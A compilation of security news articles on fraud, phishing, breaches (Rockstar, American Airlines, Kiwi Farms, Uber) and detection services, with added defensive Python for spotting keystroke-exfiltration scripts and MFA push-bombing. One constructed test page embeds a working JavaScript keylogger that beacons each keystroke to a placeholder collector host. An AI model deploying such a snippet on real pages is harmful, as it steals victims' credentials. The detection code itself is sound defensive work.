IT NEWS

Vulnerable children’s identities used in tax fraud scheme

The United States Attorney for the Southern District of New York has sentenced Ariel “Melo” Jimenez (38) to 12 years in prison for leading a “tax fraud and identity theft conspiracy” that resulted in the fraudulent claiming of tax credits, earning him millions of dollars.

“Ariel Jimenez was the leader of a long-running fraudulent tax business that cheated the Government of tax refunds by stealing the identities of vulnerable children and using those identities to falsely claim tax credits on behalf of his clients,” said US Attorney General Damian Williams in a press release. “Today’s sentence holds Jimenez accountable for brazenly selling the identities of children to his customers for his own profit.”

Jimenez was arrested with eight of his co-conspirators: Evelin Jimenez and Ana Yessenia Jimenez, his sisters; Ireline Nunez, Leyvi Castillo, Cinthia Federo, Guillermo Arias Moncion, Marcos “Junior” De Jesus Pantaleon, and Jose “Jairo” Castillo. The unsealed complaint mentioned a “corrupt New York City employee” and a “cooperating witness” (CW-1), but it didn’t name them.

Modus operandi

According to the complaint, Jimenez conspired with a fraud investigator (known as “CW-1”) within the New York City Human Resources Administration (HRA) when he established his tax fraud business in 2007 in the Bronx. The NYC HRA is a government organization tasked with providing food and emergency rental assistance for those in need.

CW-1 admitted to stealing children’s data, which comprised their names, dates of birth, and SSNs (Social Security Numbers), from the Welfare Management System and selling these to Jimenez. Jimenez would then list these children as dependents on tax returns Jimenez prepared for his clients. Jimenez and his team are said to have callously referred to these children’s identities as “pollitos” (“little chickens” or “chicks” in Spanish).

Jimenez would charge his clients between $1,000 and $1,500 per child he’d fraudulently add to their tax returns. These children are included as false dependents so the taxpayers (Jimenez’s clients) can file for inflated tax refunds.

“Jimenez’s use of stolen identities harmed the actual caretakers of the children who were fraudulently claimed as dependents,” the press release states. “In some cases, the people actually taking care of these children had much-needed tax refunds delayed and were required to prove their actual connection to their own dependent children.”

A lavish lifestyle

Since setting up his business in 2007, Jimenez has amassed millions of dollars, which he used to purchase real estate and fund a lavish lifestyle. He admitted to spending a total of $5.5M on properties in the US and abroad, on jewelry and cars, and on gambling. He transferred several properties to his parents to hide his source of funds.

On top of a 12-year sentence, Jimenez was ordered to give up three of his properties and pay forfeiture amounting to $14.580M. He was also ordered to pay restitution of $44,769,906.

Tax refund phish logs keystrokes to swipe personal details

There have been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything entered onto the page.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official gov.gr portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of €634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. What this means is that anything entered into the various entry boxes is grabbed via the keylogger and immediately sent to the fraudsters. In this scenario, realising something is wrong may not save the victim. Anything they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front-load entry forms with the important details first.

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed. With that being the case:

  • Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

  • Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling Macros, too.

  • If you believe you’ve entered any data on a phishing site, there’s a small chance it may have a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of trying to figure out if you need to take some action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? It’s time to do a small risk assessment checklist, and then make the appropriate decision as to whether you need to change passwords, cancel your card, or more.
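For readers who do "know their way around code", the Python below is an added triage helper (not part of the original article or of any research it cites) that scans a saved copy of a page for the pattern described above: keystroke event listeners sitting alongside a network call that can push data off-site before the form is ever submitted. The two page snippets are constructed samples, and the domains in them are placeholders.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Keystroke capture: addEventListener('keydown'|...) or inline on* attributes.
KEY_EVENTS = "keydown|keyup|keypress|input"
KEY_LISTENER = re.compile(
    r"addEventListener\(\s*['\"](?:%s)['\"]|\bon(?:%s)\s*=" % (KEY_EVENTS, KEY_EVENTS)
)
# Anything that can move data off the page counts as a sink.
SINKS = {
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bXMLHttpRequest\b"),
    "sendBeacon": re.compile(r"navigator\.sendBeacon\s*\("),
    "WebSocket": re.compile(r"new\s+WebSocket\s*\("),
    "Image": re.compile(r"new\s+Image\s*\("),
}
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.I)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


@dataclass
class ScanResult:
    verdict: str                                                # see scan_page()
    key_listeners: List[int] = field(default_factory=list)      # line numbers
    sinks: List[Tuple[str, int]] = field(default_factory=list)  # (kind, line)
    external_scripts: List[str] = field(default_factory=list)   # NOT analysed


def _line_of(text: str, offset: int) -> int:
    return text.count("\n", 0, offset) + 1


def scan_page(html: str) -> ScanResult:
    """Heuristic triage of a saved page. Verdicts:
    keystroke-exfil  a keystroke listener and a network sink are both present
    network-only     a sink exists but nothing hooks keystrokes (a normal login form)
    clean            no network sink found in inline code
    Obfuscated or externally loaded scripts are out of scope; the latter are
    listed so the analyst knows what was not looked at.
    """
    result = ScanResult(verdict="clean")
    for m in KEY_LISTENER.finditer(html):
        result.key_listeners.append(_line_of(html, m.start()))
    for kind, pattern in SINKS.items():
        for m in pattern.finditer(html):
            result.sinks.append((kind, _line_of(html, m.start())))
    for tag in SCRIPT_TAG.finditer(html):
        src = SRC_ATTR.search(tag.group(1))
        if src:
            result.external_scripts.append(src.group(1))
    if result.sinks and result.key_listeners:
        result.verdict = "keystroke-exfil"
    elif result.sinks:
        result.verdict = "network-only"
    return result


# Constructed sample of the behaviour described above: every key leaves the
# page immediately, whether or not the form is ever submitted.
SAMPLE_PHISH = """<html><body>
<form action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<script src="https://cdn.example.invalid/bank-theme.js"></script>
<script>
  // keystrokes are sent as they happen; submitting the form is irrelevant
  // (placeholder collector domain, constructed for this example)
  document.addEventListener('keyup', function (e) {
    navigator.sendBeacon('https://collector.example.invalid/k', e.key);
  });
</script>
</body></html>"""

# Constructed benign counterpart: data leaves the page only on submit.
SAMPLE_BENIGN = """<html><body>
<form id="f"><input name="user"><input name="pass" type="password"></form>
<script>
  document.getElementById('f').addEventListener('submit', function (e) {
    e.preventDefault();
    fetch('/login', {method: 'POST', body: new FormData(e.target)});
  });
</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        r = scan_page(page)
        print(f"{label}: {r.verdict}; key listeners at lines {r.key_listeners}; "
              f"sinks {r.sinks}; external scripts {r.external_scripts}")
```

A "keystroke-exfil" verdict is a reason to look at the lines reported, not a conviction: legitimate pages also attach input listeners for validation and call fetch for other reasons.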

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!

Grand Theft Auto 6 suffers grand theft

For games publisher Take-Two Interactive, damage control is in full effect as word spreads of a Grand Theft Auto-centric network compromise. Developer Rockstar Games has suffered a major leak of upcoming game content, specifically unfinished video footage of Grand Theft Auto 6. The first anyone knew of the attack was when the person doing the compromising posted their spoils to the popular gaming site GTAForums on Sunday. A very bad weekend lay in store for the embattled game developers.

To the forums!

The post linking the content, now edited, was made to this thread on Sunday with the following message:

Here are 90 footage/clips from GTA 6. 

It’s possible I could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.

Initially the “leak” was met with scepticism. There’s a long history of pranks and scams where supposedly stolen footage of upcoming Rockstar games are concerned. The stolen footage inevitably turns out to be re-edits of older game footage, or even shoddy looking content put together by the theoretical leaker in game development tools. Indeed, the reactions from multiple posters in the thread itself were dismissive of the content on display. However, they were about to change their tune.

The breach confirmed

It’s never a good sign when an organisation has to post up a tweet like the below:

The tweet confirms that Rockstar Games suffered a network intrusion, with an unauthorised third party accessing and downloading confidential information and development footage of the unreleased GTA 6. This tweet comes alongside a security filing which adds a little more detail to the current state of play:

Rockstar Games recently experienced a network intrusion in which an unauthorized third party illegally accessed and downloaded confidential information from its systems, including early development footage for the next Grand Theft Auto. Current Rockstar Games services are unaffected.

We have already taken steps to isolate and contain this incident. Work on the game will continue as planned. At this time, Rockstar Games does not anticipate any disruption to its current services nor any long-term effect on its development timelines as a result of this incident.

There isn’t a lot else to go on at time of writing, with Take-Two Interactive and Rockstar Games getting to grips with figuring out what happened, and if the attacker still has network access. There’s also the possibility of additional content leaks or some form of blackmail. Meanwhile, all we really have from the attacker is that the videos were “downloaded from Slack”. Clearly Rockstar Games will be very busy over the coming days and weeks.

Avoid the inevitable GTA6 scams

The leaked content will almost certainly keep popping up on sites such as YouTube and social media portals. What eager gamers need to watch out for is the scam aspect that will naturally attach itself, limpet style, to the footage. Based on what we’ve seen down the years in relation to gaming leaks, these are some of the things you should be very wary of:

  • Nobody is offering up a fully playable version of GTA6 on YouTube or anywhere else. Should you see such a claim, don’t take the bait and ignore/report the video as appropriate.

  • There is no leaked early-access style playable demo of the stolen content. Offers of playable GTA6 are almost certainly locked behind survey scams, and/or bundled with malware files. Ignore them.

  • On a similar note, emails from strangers claiming to offer up versions of GTA6 either as a download or as part of some sort of subscription service should be given a wide berth.

  • Depending on platform or title, you may need to log in to Rockstar Social Club to play your Rockstar games. It’s possible phishers may set up a scam which asks for logins in order to access fictitious versions of GTA6. Under no circumstance should you hand out your gaming logins to anybody.

Stay safe out there!

American Airlines suffers data breach after phishing incident

Major airline American Airlines has fallen victim to a data breach after a threat actor got access to the email accounts of several employees via a phishing attack.

According to a published notice of a security incident, the data breach was discovered in July 2022.

How it happened

American Airlines said the successful phishing attack led to the unauthorized access of a limited number of team member mailboxes. American Airlines discovered the breach on July 5, 2022 and immediately secured the impacted email accounts. It then hired a cybersecurity forensic firm to investigate the security incident. A forensic investigation can be a huge help to determine what happened and what the possible consequences of the incident are.

What the attackers had access to

In the notice, American Airlines wrote:

“The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.”

So far, American Airlines has not disclosed the exact number of breached email accounts or how many customers were affected.

Aftermath

American Airlines says it will implement additional technical safeguards to prevent a similar incident from happening in the future.

It offers affected customers a complimentary two-year membership of Experian’s IdentityWorks. While we would not recommend paying for such a service, getting it for free may not be a bad deal. Identity theft monitoring services sound great at first: they’re not really expensive and seem to provide peace of mind against an avalanche of ever-more damaging breaches. But they don’t, at present, protect against the worst impacts of identity theft—the theft itself.

American Airlines says it has no evidence that personal information has been abused, but recommends that you enroll in the free credit monitoring. In addition, customers should be extra vigilant, including by regularly reviewing account statements and monitoring free credit reports.

Phishing

We’d like to add that this type of incident often triggers yet another round of phishing attacks, only targeted at potentially affected customers. Typically these phishing mails will try to leverage some kind of urgency to try and trick you. For example, they might urge you to click some link to claim some sort of compensation for the incident. The sense of urgency is something almost all phishing mails have in common: They do not want you to think, just react.

Other signs that something’s phishy:

  • The email, text, or voicemail is requesting that you update/fill in personal information. This is especially dubious if it’s coming from a bank or the IRS. Treat any communication asking for your credentials with extra caution.
  • The URL shown on the email and the URL that displays when you hover over the link are different from one another.
  • The “From” address is an imitation of a legitimate address, especially from a business.
  • The formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. Or possibly there are weird paragraph breaks or extra spaces between words. If the email appears sloppy, start making the squinty “this looks suspect” face.
  • The content is badly written. Sure, there are plenty of bad writers working for legitimate organizations, but this email might seem particularly amateur. Are there obvious grammar errors? Is there awkward sentence structure, like perhaps it was written by a computer program or someone whose second language is English?
  • The email contains attachments from unknown sources that you were not expecting.
  • The website you are sent to is not secure. If you do go ahead and click on the link of an email to fill out personal information, be sure you see the “https” abbreviation as well as the lock symbol at the beginning of the URL. If not, that means any data you submit is vulnerable to cybercriminals. (If the link is malicious, Malwarebytes will block the site.)

And each of the above is reason enough to question the legitimacy of the email. Phishers have far evolved past the “Nigerian prince with a treasure” level. Above all else, trust your instincts—if it looks, smells, or feels phishy then it probably is.

Stay safe, everyone!

Kiwi Farms breached, user data potentially exposed

The operators of a site known to most observers for being in a recent state of flux have announced a forum breach. Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, was recently dropped by Cloudflare after a sustained campaign to have the DDoS mitigation and cloud hosting service abandon the forum.

The site has since returned, but with a major problem: a breach which potentially reveals a large amount of user data.

The breach revealed

The site creator had the following to say in relation to the compromise:

The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.

Assume your email has been leaked.

Assume any IP you’ve used on your Kiwi Farms account in the last month has been leaked.

The attack made use of the interplay between the main forum site and a second site running XenForo, a commercial internet forum software package written in PHP. Attackers uploaded a webpage disguised as an audio file to XenForo, then loaded this page elsewhere in a manner which caused user authentication cookies to be sent off-site. The main admin account for the forum was apparently hijacked in this same fashion.

The fallout from a forum compromise

We often warn about using forums without implementing the proper failsafes and protection, and a breach such as this hammers home the point. A lot of users on the site may now have a lot of information exposed that they’d really rather not. Similarly, curious observers or even unwary researchers or law enforcement may have registered and not considered the possibility of a data leak.

This data could end up anywhere, and there’s no surefire way to know what’s been taken. It could end up on other forums, data dumps, or in the hands of law enforcement agencies. No matter what site you’re registered on, you should consider:

  • Use different passwords for all sites. Once those data dumps go public, cybercriminals will try logging in to other accounts using the same email and username combinations.

  • Consider using a VPN, Tor, or some other method to obscure your IP address. Some forums insist on people using their real IP address when registering and posting to a forum, and may even ban or block VPNs, proxies, and other services.

  • Be careful what you reveal to other site users via direct messages. People tend to not delete these messages, and sites don’t always auto-prune older messages. It’s also possible sites may store data sent and received, and not even tell you.

It remains to be seen what happens to Kiwi Farms, and the site owner is looking to migrate away from aspects of the site which led to this compromise. For now, it’s a timely reminder to keep on top of potential system vulnerabilities and also consider what data you may be leaving on a site for others to collect at the worst possible moment.

EDR vs MDR vs XDR – What’s the Difference?

Cyberattacks are rapidly evolving, leaving businesses and their IT security teams to handle immense workloads.

Keeping up with today’s cyberthreats not only involves staying up to date in an ever-changing threat landscape, it also involves managing complex security infrastructure and technologies. Detection and response tools are designed to help security teams monitor, evaluate, and respond to potential threat actor activity.

EDR, MDR, and XDR can alleviate challenges most small business cybersecurity teams face, such as alert fatigue and limited resources.

Although detection and response tools share similar purposes, they are not all equal. Every threat detection and response capability has its own advantages when it comes to addressing the needs of your business and catching threats that have thwarted traditional security layers.

Let’s dive into the basics of three common detection and response solutions.

Endpoint Detection and Response (EDR)

Endpoint detection and response (EDR) solutions cover all endpoint monitoring and activity through threat hunting, data analysis, and remediation to stop a range of cyberattacks. These attacks include malware, ransomware, brute force, and zero-day intrusions.

Managed Detection and Response (MDR)

Managed detection and response (MDR) is a service that offers a suite of outsourced capabilities to deliver round-the-clock, 24/7/365 monitoring and detection, proactive threat hunting, prioritization of alerts, correlated data analysis, managed threat investigation, and remediation. MDR is popularly thought of as an in-house Security Operations Center (SOC) alternative. It blends a human element of highly-skilled experts with threat intelligence technologies.

Extended Detection and Response (XDR)

Extended detection and response (XDR) is a proactive cybersecurity solution that provides improved, unified visibility over endpoints, networks, and the cloud through aggregating siloed data across an organization’s security stack.

What is the difference between EDR vs MDR vs XDR?

Today’s industry-leading detection and response technologies rely on threat intelligence data pulled from different sources. This threat intel data varies in readability and usefulness depending on the tool and its intended audience, your security team, decision-makers, or key stakeholders. Not all businesses have the cybersecurity resources to interpret copious amounts of data, investigate alerts, and act on threats.

Let’s compare threat detection and response tools and the challenges they address.

EDR vs MDR

The difference between EDR and MDR is scale.

The needs of your organization, the number of assets and endpoint devices to protect, available resources, bandwidth, and in-house cybersecurity skill level are all factors to consider when it comes to MDR vs EDR. Addressing your business’ security challenges is crucial to understanding how much visibility your company really needs; doing so will help determine the detection and response technology best fit for your business and enhance your cybersecurity stack.

EDR has several benefits and provides holistic visibility into the attack surface of all your endpoints and can detect threats that circumvent legacy endpoint protection platforms (EPP). Endpoint Detection and Response is a staple for establishing a comprehensive security strategy and lays the groundwork for scalable cybersecurity maturity. Although fundamental, it generates a lot of alerts and endpoint telemetry data, adding to its complexity. It requires skilled cybersecurity talent who can readily handle high alert volume, interpret EDR alerts, and respond proficiently. The key takeaway is that standalone EDR products help businesses wanting to enhance their endpoint security posture but require a level of resources and advanced cybersecurity personnel.

MDR security is a managed service which merges human expertise with threat intelligence, offering advanced threat hunting, threat identification, alert prioritization, and incident response. MDR helps businesses obtain outsourced, highly skilled cybersecurity experts at an affordable cost. Regardless of size and level of expertise, your current IT team can leverage a turnkey experience with Managed Detection and Response to close the skill gap in specialized security talent. Small businesses seeking to build security maturity, handle complex threats, and relieve in-house alert fatigue have everything to gain from Managed Detection and Response.

MDR vs XDR

XDR works to consolidate alerts and unify previously siloed data from a range of cybersecurity tools. Businesses struggling with an influx of alerts across multiple existing security tools have the most to benefit from XDR solutions. Providing extended visibility, the tool is centered on aggregating and correlating telemetry from various security tools and enhancing defense across the security ecosystem.

Extended Detection and Response addresses the challenges of businesses with multilayered security architecture.

Tips for choosing a threat detection and response tool for your business

Choosing the right detection and response tool starts with addressing your business’ security needs at scale. Simply put, your organization should consider the following questions:

• What does my company need to protect? What assets are most vulnerable to being compromised?
• How much visibility does my organization need?
• Does my security team have the skillset, time, and bandwidth to handle large security workloads?
• What are the resource constraints of my organization?
• Who will be analyzing, investigating, and responding to detected threats, alerts, and data?


A week in security (September 12 – 18)

Last week on Malwarebytes Labs:

Stay safe!

Hookup site targeted by typo-squatters

Ethical hacker and security researcher Kody Kinzie shared with BleepingComputer a list of over 50 domains of which many are spelling variations of the brand name Sniffies.

Sniffies identifies itself as a “modern, map-based, meetup app for gay, bi, and curious guys.”

Kody used an open source tool called DNSTwist to generate a list of lookalike domains for Sniffies.com. Out of the 3531 possibilities generated by the tool, 51 represented valid domains.

“I saw a good amount of domains registered with the same MX server set up, even though the domains were hosted on random platforms.”

A mail exchanger record (MX record) specifies the mail server responsible for accepting email messages on behalf of a domain name. So that would imply that the domains were set up by the same threat actor.

Typosquatting

Typosquatting is a term you may have seen when reading about Internet scams. In essence it relies on users making typing errors (typos) when entering a site or domain name. Sometimes it is also referred to as URL hijacking or domain mimicry, but IMHO the word typosquatting more accurately describes the matter. As you will understand, the success of a typosquat scammer depends on the number of victims that are likely to misspell the intended domain and land on the scammers’ pages.

One factor is the popularity of the domain. With an estimated number of 79,600 visitors per day, Sniffies certainly qualifies in that department.

Advertising

BleepingComputer’s test results were described as:

“Once accessed, the illicit ‘Sniffies’ copycat domains do one of the following things:

  • Push the user to install dubious Chrome extensions
  • Launch the ‘Music’ App on Apple devices right from the web browser
  • Lead the users to bogus technical ‘support’ scam sites
  • Lead the users to fake job posting sites”

Obviously, we did some testing of our own. We found some domains that had either been abandoned or parked for the future, but some did what they were set up for—redirect visitors based on some basic system properties and the location (based on IP address).

Most of the redirects we found at Malwarebytes went to advertising sites that were more or less legitimate. But certainly not what the user would be looking for. Many shared this look, offering the visitor a few choices.

(Screenshot: advertisement choices offered by a redirect page)

In one instance (Dutch IP, Windows system) we were redirected to a fake Microsoft Defender warning site (including soundtrack and locked screen), parked in the domain ondigitalocean.app which has been on Malwarebytes’ radar for some time.

(Screenshot: fake Microsoft Defender warning)

We also found one of the Chrome extensions that BleepingComputer described as dubious. Malwarebytes detects these extensions as PUP.Optional.AdMax.

(Screenshot: Adblock Max extension)

Mitigation

While it’s certainly nice to read how these campaigns work and how the research was done, Sniffies is just an example of what is out there.

To avoid falling victim to typosquatters, there are a few basic measures you can take, which are in essence aimed at not typing the URL.

  • Bookmark your favorites
  • Use search results rather than typing the URL in the address bar
  • Leave some or all of the sites that you visit every day open in your browser tabs (most popular browsers offer the option to continue where you left off or to specify a set of sites to start with)
  • Never click links in unexpected emails or on unknown sites
  • Use an antivirus or anti-malware solution that offers web protection and preferably even an anti-exploit solution.

Stay safe, everyone!


3 ways MDR can drive business growth for MSPs

The managed service provider market is growing rapidly. As cyberattacks continue to increase worldwide, more and more small-and-medium-sized businesses (SMBs) are looking to MSPs to take the load off when it comes to securing their business. 

With more business, of course, comes more competition—and what better way to whet your competitive edge than to offer security services that SMBs desperately need?

It’s a no-brainer. By focusing on the specific security needs of their customers, MSPs can attract and retain the 91% of SMBs who would consider switching service providers if another one offered the “right” cybersecurity services.

Okay, but that raises the question: Exactly what security service should MSPs be offering to their clients? Endpoint protection, EDR, and VPM services are high up there—but you may not know that Managed Detection and Response (MDR) is another must-have.

MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack. Gartner reports that, by 2025, 50% of organizations will be using MDR services for threat monitoring, detection, and response functions that offer threat containment capabilities.

The core service capabilities of MDR include:

  • 24×7 monitoring of an organization’s environment for threats.

  • Threat detection, alerting, and response from highly experienced security analysts.

  • Correlation of endpoint alerts with other data sources to identify threats and response measures more effectively.

  • Proactive cyber threat hunting based on past indicators of compromise (IOCs)

While it’s technically possible for MSPs to build out their own MDR program in-house, doing so takes the same time, expense, and effort as starting an entirely new IT security department. You’ll need to build out your own security operations center (SOC) facilities, hire a minimum of five full-time employees to provide 24/7 coverage, and so on.

In short, the expertise and infrastructure required for MDR is why many MSPs opt to outsource their MDR to a service provider. 

Here are three ways MDR can drive business growth for MSPs.

1. Minimize dwell time

In the cybersecurity world, dwell time is the time that elapses between malware or an attacker infiltrating a system and the moment they are detected (and removed).

The longer the dwell time, the longer an attacker has to elevate their privileges and move deeper into a network in search of sensitive data and other high-value assets. We call this lateral movement—and MDR can nip it in the bud, preventing a potential data breach. It’s all made possible by threat hunting. 

Threat hunting typically includes two essential functions in the delivery of MDR services:

  • A research-based approach, where security analysts look, or “hunt,” for known attackers or adversarial behaviors listed in threat intelligence services. 

  • An active hunting approach, where security analysts systematically review your organization’s environment to uncover any current suspicious activity or newly emerging indicators of compromise (IOCs) that are in progress.  

Because both research-based and active threat hunting can stop an attacker before they exfiltrate data or deploy ransomware, outsourcing your threat hunting can greatly help control infections for your MSP clients. And if you have a reputation for letting fewer threats through than your competitors, you’ll likely attract more business.


2. Overcome alert fatigue

Let’s say your MSP business serves more than 60 customers, ranging from small businesses with a handful of employees to larger companies with about 150 users. 

Every day, your small team works to protect thousands of endpoints, and deals with an ever-growing number of alerts.

With constant alerts demanding attention, MSP security analysts end up being overworked and exhausted, reducing their ability to properly identify and triage alerts to prevent malware infections and the spread of damage. That can lead to missed threats getting through to clients—ultimately leading to data loss and downtime for their organizations.

By outsourcing your MDR, your environment is monitored 24x7x365 by a team of advanced cybersecurity analysts. Rather than scrambling to identify and understand critical threat alerts, your MSP team receives notifications from the MDR team with guidance to remediate critical threats.

Not only can this increase your team’s morale and job satisfaction, but it also opens your team’s resources to focus on net new billable projects.

3. Increase customer satisfaction and MRR

If you’re an MSP, you might find three ways to take your business to the next level:

  • Increasing your number of customers offers increased monthly recurring revenue (MRR) and diversifies your client base, but providing the services businesses are looking for could require extra staff.

  • Recruiting larger customers could increase MRR at a lower marginal cost than serving multiple small clients, but a larger client could require more resources to properly manage.

  • Upselling existing customers would allow your MSP to build upon your current customer base, but it will require a compelling value proposition to encourage satisfied customers to increase their monthly spend.

Finding an offering that provides 24x7x365 security is a great way to increase your number of customers, recruit larger customers, and upsell existing customers all at once—and MDR can make it happen. Specifically, beyond 24x7 real-time threat detection and threat hunting, MDR offers a few other key features that businesses of all sizes are looking for:

  • Threat intelligence: Provides insights into who attackers are, where they can access the network, and specific actions that can be taken to strengthen defenses against a future attack. 

  • Effective threat response: An MDR service provider with top-tier security analysts will have the skills to tackle complex threats. This will reduce an organization’s mean time to respond (MTTR).

  • Reporting: MDR service providers give transparent and consistent communication, sharing details about their threat detection and giving expert guidance on responding to and remediating security threats.

By outsourcing your MDR, you can offer all of these in-demand activities for current and prospective clients without needing your own in-house MDR tools and staff.

Transform your MSP business with MDR

The threat hunting, threat intelligence, and threat response capabilities of MDR make it a must-have solution for any security-minded SMB. Likewise, with the demand for MDR services on the rise, MSPs would be wise to include it in their security portfolio. 

For many MSPs, however, delivering MDR services isn’t possible with their current staff and tools. 

Partnering with an MDR vendor provides several key advantages, giving you fast time-to-market to immediately address market demand and enabling you to offer a service that has top-tier professionals and uses the best security tools. 

Want to learn more about the tools MDR analysts use to detect and respond to threats? Check out our webinar: Malwarebytes for Business Demo.


Uber hacked

Uber informed the public on Thursday it was responding to a cybersecurity incident after somebody breached its network. From what we have been able to find out so far, the attacker managed to compromise an employee’s access to the chat app Slack. The intruder may also have gained access to the Amazon and Google-hosted cloud environments where Uber stores its source code and customer data, and to the company’s HackerOne account, which contains information about security flaws in its products.

There has been no indication that Uber’s fleet of vehicles or its operation was affected.

Security researchers who spoke with the hacker, who claims to be 18 years of age, are under the impression that the threat actor’s main motive seems to be to show off what he did. The person also said Uber drivers should receive higher pay.

A highly respected source revealed that the threat actor spammed an employee with MFA push requests, an established tactic that can defeat some kinds of multi-factor authentication by simply annoying a victim into submission. This type of MFA sends a notification to a user whenever their username and password are used. The user has to approve the login by pressing a button on a smartphone app. The idea is that a stolen username and password are useless to an attacker unless they also have physical access to the victim’s phone. It doesn’t always work like that though. Unfortunately, some criminals have learned that they can batter people into submission by repeatedly using the username and password until the victim approves the login just to make the notifications stop.

In this case the attacker reportedly contacted the employee on WhatsApp and told them they had to accept the requests to make them stop, at which point the victim did as instructed.
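One defender-side check for the push-bombing pattern described above, as an added example that is not from the original article: it scans constructed MFA log lines for a user who receives many push notifications inside a short window, and escalates when an approval follows a run of denials, which is exactly the worn-down-victim outcome. The log format, field names and event names are assumptions.

```python
# Added example, not from the article: flag MFA push-bombing by counting push
# notifications to one user in a sliding window. Log format and sample lines are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2022-09-15T21:02:10Z user=alice event=push_sent src=198.51.100.9
2022-09-15T21:02:15Z user=alice event=push_denied src=198.51.100.9
2022-09-15T21:02:40Z user=alice event=push_sent src=198.51.100.9
2022-09-15T21:03:05Z user=alice event=push_sent src=198.51.100.9
2022-09-15T21:03:30Z user=alice event=push_sent src=198.51.100.9
2022-09-15T21:03:33Z user=alice event=push_denied src=198.51.100.9
2022-09-15T21:04:01Z user=alice event=push_sent src=198.51.100.9
2022-09-15T21:04:20Z user=alice event=push_approved src=198.51.100.9
2022-09-15T21:05:00Z user=bob event=push_sent src=192.0.2.33
2022-09-15T21:05:03Z user=bob event=push_approved src=192.0.2.33
"""

def parse_line(line):
    ts, *fields = line.split()  # "<ISO timestamp> key=value ..."
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec

def detect_push_fatigue(log_text, threshold=5, window=timedelta(minutes=10)):
    by_user = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            by_user[rec["user"]].append(rec)
    alerts = {}
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["ts"])
        sent = [r["ts"] for r in recs if r["event"] == "push_sent"]
        burst = []  # largest set of pushes fitting in one window that ends at a push
        for i, ts in enumerate(sent):
            current = [t for t in sent[: i + 1] if t >= ts - window]
            if len(current) >= threshold and len(current) > len(burst):
                burst = current
        if burst:
            after = [r for r in recs if r["ts"] >= burst[0]]  # events since burst began
            approved = any(r["event"] == "push_approved" for r in after)
            alerts[user] = {
                "pushes": len(burst),
                "denied": sum(r["event"] == "push_denied" for r in after),
                "approved_after_burst": approved,
                # an approval after repeated denials is the worn-down-victim case
                "severity": "critical" if approved else "high",
            }
    return alerts
```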

Slack

Slack is a messaging system that’s widely used by, and within, tech companies as an alternative to email. It allows direct messages between individuals, and conversations among groups of people take place in channels dedicated to specific topics or areas of concern. Channels contain a complete history of every conversation they have ever hosted, and may contain sensitive or valuable information. In other words, Slack can be a potential gold mine for an attacker looking to expand their access and impact.

The New York Times reports that Uber was forced to take several internal communications and engineering systems offline after the attacker used Slack to send a message to Uber employees.

The Slack message, including spelling errors, read:

“I announce I am a hacker and uber has suffered a data breach. Slack has been stolen, confidential data with Confluence, stash and two monorepos from phabricator have also been stolen, along with secrets from sneakers. #uberunderpaisdrives”

The message was received as a joke by Uber’s employees in the Slack channel at first, but people soon started realizing the claims were serious. To prove that the intruder really had access they posted a photo on an internal information page for employees, as well as screenshots of the Uber AWS instance, HackerOne administration panel, and more.

HackerOne is a vulnerability coordination and bug bounty platform that connects businesses who want to know about security issues in their products with penetration testers and cybersecurity researchers looking to be rewarded for their bug-hunting efforts.

I suppose if there is one thing you don’t want a hacker to get their hands on, it’s the company’s HackerOne administration panel. Imagine someone having access to a list of unfixed security vulnerabilities affecting your organization, alongside proof-of-concept code that can exploit them.

We reached out to HackerOne to ask about the security measures that apply to a company account. We are awaiting their response.

No hush, hush this time

Uber famously covered up a 2016 data breach that affected its 57 million customers and drivers. The company hid the incident from the public and paid the hackers $100,000 to delete the data and keep quiet. That Uber hack came to light after new leadership took over the company in 2017, a year after the incident occurred. Uber settled the case with the DOJ (US Department of Justice) and paid $148M in a civil litigation settlement.